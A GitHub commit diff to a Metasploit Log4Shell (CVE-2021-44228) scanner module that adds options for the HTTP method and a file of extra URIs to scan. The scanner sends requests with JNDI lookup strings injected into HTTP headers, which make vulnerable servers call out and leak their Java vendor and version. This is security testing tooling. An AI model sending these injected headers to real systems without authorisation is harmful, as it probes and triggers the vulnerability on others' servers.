Skip to content

Commit

Permalink
Support an input URI list for scanning
Browse files Browse the repository at this point in the history
zeroSteiner committed Dec 15, 2021
1 parent 0bf355a commit 725904c
Showing 1 changed file with 19 additions and 4 deletions.
23 changes: 19 additions & 4 deletions modules/auxiliary/scanner/http/log4shell_scanner.rb
Original file line number Diff line number Diff line change
@@ -20,11 +20,13 @@ def initialize
)

register_options([
OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
OptPath.new('HEADERS_FILE', [
true, 'File containing headers to check',
File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
]),
OptPath.new('URIS_FILE', [ false, 'File containing additional URIs to check' ])
])
end

@@ -79,8 +81,21 @@ def replicant
end

# Fingerprint a single host
def run_host(_ip)
method = 'GET'
def run_host(ip)
run_host_uri(ip, normalize_uri(target_uri)) unless target_uri.blank?

return if datastore['URIS_FILE'].blank?

File.open(datastore['URIS_FILE'], 'rb').lines.each do |uri|
uri.strip!
next if uri.start_with?('#')

run_host_uri(ip, normalize_uri(target_uri, uri))
end
end

def run_host_uri(_ip, uri)
method = datastore['HTTP_METHOD']
headers_file = File.open(datastore['HEADERS_FILE'], 'rb')
headers_file.lines.each do |header|
header.strip!
@@ -90,12 +105,12 @@ def run_host(_ip)
@tokens[token] = {
rhost: rhost,
rport: rport,
target_uri: normalize_uri(target_uri),
target_uri: uri,
method: method,
header: header
}
send_request_raw({
'uri' => normalize_uri(target_uri),
'uri' => uri,
'method' => method,
# https://twitter.com/404death/status/1470243045752721408
'headers' => { header => jndi_string("#{token}/${sys:java.vendor}_${sys:java.version}") }

0 comments on commit 725904c

Please sign in to comment.